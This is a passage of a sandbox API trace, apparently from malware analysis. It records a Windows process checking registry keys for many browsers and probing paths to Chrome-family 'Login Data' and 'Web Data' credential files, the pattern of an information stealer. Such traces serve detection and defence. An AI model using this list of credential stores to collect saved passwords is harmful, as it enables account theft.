Size=0x410) returned 0x6a6358 [0144.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.637] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Mozilla Firefox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb98*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb98*=0x104) returned 0x2 [0144.637] GetProcessHeap () returned 0x690000 [0144.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.638] GetProcessHeap () returned 0x690000 [0144.638] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6a6358 [0144.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.639] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\ComodoGroup\\IceDragon\\Setup", pszValue="SetupPath", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fba8*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fba8*=0x104) returned 0x2 [0144.639] GetProcessHeap () returned 0x690000 [0144.639] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.654] GetProcessHeap () returned 0x690000 [0144.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6a6358 [0144.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.655] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Apple Computer, Inc.\\Safari", pszValue="InstallDir", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb9c*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb9c*=0x104) returned 0x2 [0144.655] GetProcessHeap () returned 0x690000 [0144.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.656] GetProcessHeap () returned 0x690000 [0144.656] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6a6358 [0144.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.658] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\K-Meleon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fba4*=0x104) returned 0x2 [0144.658] GetProcessHeap () returned 0x690000 [0144.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.658] GetProcessHeap () returned 0x690000 [0144.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6a6358 [0144.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.661] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\mozilla.org\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb8c*=0x104) returned 0x2 [0144.661] GetProcessHeap () returned 0x690000 [0144.661] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.661] GetProcessHeap () returned 0x690000 [0144.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6a6358 [0144.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.663] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\SeaMonkey", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb8c*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fb8c*=0x104) returned 0x2 [0144.663] GetProcessHeap () returned 0x690000 [0144.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.664] GetProcessHeap () returned 0x690000 [0144.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x410) returned 0x6a6358 [0144.665] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.666] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Flock", pszValue="CurrentVersion", pdwType=0x0, pvData=0x6a6358, pcbData=0x19fba4*=0x104 | out: pdwType=0x0, pvData=0x6a6358, pcbData=0x19fba4*=0x104) returned 0x2 [0144.666] GetProcessHeap () returned 0x690000 [0144.667] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a6358 | out: hHeap=0x690000) returned 1 [0144.667] GetProcessHeap () returned 0x690000 [0144.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6a3da8 [0144.668] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0144.669] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6a3da8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0144.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.680] StrStrW (lpFirst="C:\\Program Files (x86)", lpSrch="(x86)") returned="(x86)" [0144.682] GetProcessHeap () returned 0x690000 [0144.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6a8100 [0144.682] ExpandEnvironmentStringsW (in: lpSrc="%ProgramW6432%", lpDst=0x6a8100, nSize=0x104 | out: lpDst="C:\\Program Files") returned 0x11 [0144.682] GetProcessHeap () returned 0x690000 [0144.682] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6a) returned 0x6a8310 [0144.683] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.684] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\NETGATE\\Black Hawk", arglist=0x19fbb4 | out: param_1="C:\\Program Files\\NETGATE\\Black Hawk") returned 35 [0144.684] GetProcessHeap () returned 0x690000 [0144.684] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4a) returned 0x696fc8 [0144.684] GetProcessHeap () returned 0x690000 [0144.685] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.686] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.686] PathFileExistsW (pszPath="C:\\Program Files\\NETGATE\\Black Hawk") returned 0 [0144.687] GetProcessHeap () returned 0x690000 [0144.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x696fc8 | out: hHeap=0x690000) returned 1 [0144.688] GetProcessHeap () returned 0x690000 [0144.688] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8100 | out: hHeap=0x690000) returned 1 [0144.688] GetProcessHeap () returned 0x690000 [0144.688] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3fcc) returned 0x6a8100 [0144.689] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.690] wvsprintfW (in: param_1=0x6a8100, param_2="%s\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}", arglist=0x19fbbc | out: param_1="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 90 [0144.690] GetProcessHeap () returned 0x690000 [0144.691] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb8) returned 0x6ac0d8 [0144.691] GetProcessHeap () returned 0x690000 [0144.691] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8100 | out: hHeap=0x690000) returned 1 [0144.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.692] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Lunascape\\Lunascape6\\plugins\\{9BDD5314-20A6-4d98-AB30-8325A95771EE}") returned 0 [0144.693] GetProcessHeap () returned 0x690000 [0144.693] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac0d8 | out: hHeap=0x690000) returned 1 [0144.705] GetProcessHeap () returned 0x690000 [0144.705] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6a8100 [0144.706] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0144.706] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x6a8100 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0144.708] GetProcessHeap () returned 0x690000 [0144.708] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.708] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.709] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 78 [0144.709] GetProcessHeap () returned 0x690000 [0144.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69ace0 [0144.709] GetProcessHeap () returned 0x690000 [0144.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.711] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Login Data") returned 0 [0144.711] GetProcessHeap () returned 0x690000 [0144.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69ace0 | out: hHeap=0x690000) returned 1 [0144.711] GetProcessHeap () returned 0x690000 [0144.711] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.712] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.713] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 76 [0144.713] GetProcessHeap () returned 0x690000 [0144.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69b0d0 [0144.713] GetProcessHeap () returned 0x690000 [0144.713] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.714] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comodo\\Dragon\\User Data\\Default\\Web Data") returned 0 [0144.715] GetProcessHeap () returned 0x690000 [0144.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b0d0 | out: hHeap=0x690000) returned 1 [0144.753] GetProcessHeap () returned 0x690000 [0144.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.754] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.755] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 59 [0144.755] GetProcessHeap () returned 0x690000 [0144.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6ac278 [0144.755] GetProcessHeap () returned 0x690000 [0144.755] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.756] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Login Data") returned 0 [0144.757] GetProcessHeap () returned 0x690000 [0144.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.757] GetProcessHeap () returned 0x690000 [0144.757] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.758] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.758] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 67 [0144.758] GetProcessHeap () returned 0x690000 [0144.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8a) returned 0x6ac288 [0144.758] GetProcessHeap () returned 0x690000 [0144.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.760] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalComodo\\Dragon\\Default\\Login Data") returned 0 [0144.761] GetProcessHeap () returned 0x690000 [0144.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.761] GetProcessHeap () returned 0x690000 [0144.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.762] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.764] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 87 [0144.764] GetProcessHeap () returned 0x690000 [0144.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb2) returned 0x6ac2a0 [0144.764] GetProcessHeap () returned 0x690000 [0144.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.765] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.766] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Login Data") returned 0 [0144.766] GetProcessHeap () returned 0x690000 [0144.766] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.766] GetProcessHeap () returned 0x690000 [0144.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.767] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.768] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 85 [0144.768] GetProcessHeap () returned 0x690000 [0144.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xae) returned 0x6ac298 [0144.768] GetProcessHeap () returned 0x690000 [0144.769] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.770] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\Default\\Web Data") returned 0 [0144.770] GetProcessHeap () returned 0x690000 [0144.770] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.770] GetProcessHeap () returned 0x690000 [0144.770] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.771] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.772] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 68 [0144.772] GetProcessHeap () returned 0x690000 [0144.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8c) returned 0x6ac278 [0144.772] GetProcessHeap () returned 0x690000 [0144.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.773] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.774] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Login Data") returned 0 [0144.774] GetProcessHeap () returned 0x690000 [0144.774] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.774] GetProcessHeap () returned 0x690000 [0144.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.775] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.777] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 76 [0144.777] GetProcessHeap () returned 0x690000 [0144.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69ace0 [0144.777] GetProcessHeap () returned 0x690000 [0144.777] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.778] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMapleStudio\\ChromePlus\\Default\\Login Data") returned 0 [0144.778] GetProcessHeap () returned 0x690000 [0144.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69ace0 | out: hHeap=0x690000) returned 1 [0144.779] GetProcessHeap () returned 0x690000 [0144.779] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.780] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.780] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 78 [0144.780] GetProcessHeap () returned 0x690000 [0144.780] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xa0) returned 0x69a458 [0144.780] GetProcessHeap () returned 0x690000 [0144.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.781] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 0 [0144.782] GetProcessHeap () returned 0x690000 [0144.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69a458 | out: hHeap=0x690000) returned 1 [0144.782] GetProcessHeap () returned 0x690000 [0144.782] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.783] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.783] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 76 [0144.783] GetProcessHeap () returned 0x690000 [0144.783] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x9c) returned 0x69b0d0 [0144.783] GetProcessHeap () returned 0x690000 [0144.784] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.784] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 0 [0144.785] GetProcessHeap () returned 0x690000 [0144.785] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b0d0 | out: hHeap=0x690000) returned 1 [0144.785] GetProcessHeap () returned 0x690000 [0144.785] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.785] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.786] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 59 [0144.786] GetProcessHeap () returned 0x690000 [0144.786] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7a) returned 0x6ac278 [0144.786] GetProcessHeap () returned 0x690000 [0144.786] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.787] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Login Data") returned 0 [0144.788] GetProcessHeap () returned 0x690000 [0144.788] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.788] GetProcessHeap () returned 0x690000 [0144.788] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.788] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.789] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 67 [0144.789] GetProcessHeap () returned 0x690000 [0144.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x8a) returned 0x6ac288 [0144.789] GetProcessHeap () returned 0x690000 [0144.789] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.848] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.848] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome\\Default\\Login Data") returned 0 [0144.849] GetProcessHeap () returned 0x690000 [0144.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.849] GetProcessHeap () returned 0x690000 [0144.849] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.850] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.851] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 73 [0144.851] GetProcessHeap () returned 0x690000 [0144.851] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x96) returned 0x6ac2a0 [0144.851] GetProcessHeap () returned 0x690000 [0144.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.852] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.852] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Login Data") returned 0 [0144.853] GetProcessHeap () returned 0x690000 [0144.853] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.853] GetProcessHeap () returned 0x690000 [0144.853] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.854] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.855] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 71 [0144.855] GetProcessHeap () returned 0x690000 [0144.855] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x92) returned 0x6ac298 [0144.855] GetProcessHeap () returned 0x690000 [0144.855] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.856] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.856] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Nichrome\\User Data\\Default\\Web Data") returned 0 [0144.856] GetProcessHeap () returned 0x690000 [0144.857] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac298 | out: hHeap=0x690000) returned 1 [0144.857] GetProcessHeap () returned 0x690000 [0144.857] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6a8310 [0144.858] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.859] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 54 [0144.859] GetProcessHeap () returned 0x690000 [0144.859] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x70) returned 0x6ac278 [0144.859] GetProcessHeap () returned 0x690000 [0144.859] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.860] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Login Data") returned 0 [0144.861] GetProcessHeap () returned 0x690000 [0144.861] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac278 | out: hHeap=0x690000) returned 1 [0144.861] GetProcessHeap () returned 0x690000 [0144.861] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f6e) returned 0x6a8310 [0144.862] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.863] wvsprintfW (in: param_1=0x6a8310, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 62 [0144.863] GetProcessHeap () returned 0x690000 [0144.863] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x80) returned 0x6ac288 [0144.863] GetProcessHeap () returned 0x690000 [0144.863] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.864] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalNichrome\\Default\\Login Data") returned 0 [0144.864] GetProcessHeap () returned 0x690000 [0144.865] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac288 | out: hHeap=0x690000) returned 1 [0144.865] GetProcessHeap () returned 0x690000 [0144.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f84) returned 0x6a8310 [0144.866] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.866] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 73 [0144.866] GetProcessHeap () returned 0x690000 [0144.866] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x96) returned 0x6ac2a0 [0144.866] GetProcessHeap () returned 0x690000 [0144.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8310 | out: hHeap=0x690000) returned 1 [0144.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0144.868] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\RockMelt\\User Data\\Default\\Login Data") returned 0 [0144.868] GetProcessHeap () returned 0x690000 [0144.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac2a0 | out: hHeap=0x690000) returned 1 [0144.868] GetProcessHeap () returned 0x690000 [0144.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6a8310 [0144.869] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0144.870] wvsprintfW (in: param_1=0x6a8310, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: 